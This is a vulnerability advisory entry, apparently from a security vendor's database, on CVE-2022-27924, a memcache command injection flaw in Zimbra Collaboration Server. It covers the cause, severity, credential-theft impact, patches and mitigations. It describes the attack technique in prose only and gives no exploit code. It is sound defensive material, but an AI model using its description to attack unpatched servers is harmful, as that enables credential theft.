Cloud Vulnerability DB
A community-led vulnerabilities database
Vulnerability DatabaseCVE-2022-27924
CVE-2022-27924:
Zimbra Collaboration Server vulnerability analysis and mitigation
Overview
Zimbra Collaboration (aka ZCS) versions 8.8.15 and 9.0 contained a high-severity vulnerability (CVE-2022-27924) that allowed an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. The vulnerability was discovered by SonarSource researchers in March 2022 and patched by Zimbra in May 2022 with versions 8.8.15 Patch 31.1 and 9.0.0 Patch 24.1 (Sonar Blog, Zimbra Advisory).
Technical details
The vulnerability arose from improper escaping of newline characters in untrusted user input before constructing Memcached commands. This allowed attackers to inject arbitrary commands into the Memcached protocol stream. When exploited, the vulnerability caused an overwrite of arbitrary cached entries, as the injected memcache commands became unescaped. The vulnerability received a CVSS v3.1 base score of 7.5 HIGH (Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) (NVD, CISA Advisory).
Impact
When successfully exploited, an attacker could steal cleartext email account credentials from users of a targeted Zimbra instance without requiring any user interaction. In environments not enforcing multifactor authentication (MFA), the stolen credentials could be used for spear phishing, social engineering, and business email compromise (BEC) attacks. Additionally, attackers could use the credentials to deploy webshells and maintain persistent access (CISA Advisory).
Mitigation and workarounds
Organizations were strongly advised to upgrade to Zimbra versions 8.8.15 Patch 31.1 or 9.0.0 Patch 24.1 or later. Additional recommended mitigations included blocking internet traffic to Zimbra servers where possible and configuring Zimbra to block external Memcached access, even on patched versions. Organizations that did not immediately patch upon release were advised to assume compromise and hunt for malicious activity (CISA Advisory).
Community reactions
Due to the severity and active exploitation of the vulnerability, CISA added CVE-2022-27924 to its Known Exploited Vulnerabilities Catalog on August 4, 2022, requiring federal agencies to patch by August 25, 2022 (CISA Advisory).
Additional resources
Source: This report was generated using AI
Free Vulnerability Assessment
Benchmark your Cloud Security Posture
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Additional Wiz resources
Get a personalized demo
Ready to see Wiz in action?
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management